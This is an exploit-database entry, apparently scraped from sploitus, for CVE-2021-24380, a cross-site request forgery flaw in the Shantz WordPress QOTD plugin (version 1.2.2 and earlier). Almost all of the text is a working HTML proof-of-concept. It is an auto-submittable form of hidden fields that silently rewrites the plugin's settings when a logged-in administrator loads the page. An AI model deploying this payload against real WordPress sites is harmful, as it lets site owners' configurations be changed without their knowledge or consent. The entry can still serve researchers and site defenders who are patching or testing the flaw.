Exploit for Shantz WordPress QOTD <= 1.2.2 - Arbitrary Setting Update via CSRF CVE-2021-24380

Name: Exploit for Shantz WordPress QOTD <= 1.2.2 - Arbitrary Setting Update via CSRF CVE-2021-24380
Rating: 5 (398 reviews)

2021-07-19 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:1DD0F9A8-22AB-4ECC-A925-605822739000
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=shantz-wp-qotd.php" method="POST">
      <input type="hidden" name="shantzWpQotdEnable" value="true" />
      <input type="hidden" name="shantzWpQotdSrcBox" value="true" />
      <input type="hidden" name="shantzWpQotdSrcFile" value="false" />
      <input type="hidden" name="shantzWpQotdSeparator" value="" />
      <input type="hidden" name="shantzWpQotdDb" value="Quote via CSRF" />
      <input type="hidden" name="shantzWpQotdPattern" value="qottd" />
      <input type="hidden" name="shantzWpQotdAddAuto" value="true" />
      <input type="hidden" name="shantzWpQotdExcludePages" value="false" />
      <input type="hidden" name="shantzWpQotdAddBottom" value="true" />
      <input type="hidden" name="shantzWpQotdStaticTextBefore" value="" />
      <input type="hidden" name="shantzWpQotdStaticTextAfter" value="" />
      <input type="hidden" name="update&#95;shantzWpQotdPluginSettings" value="Update&#32;Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>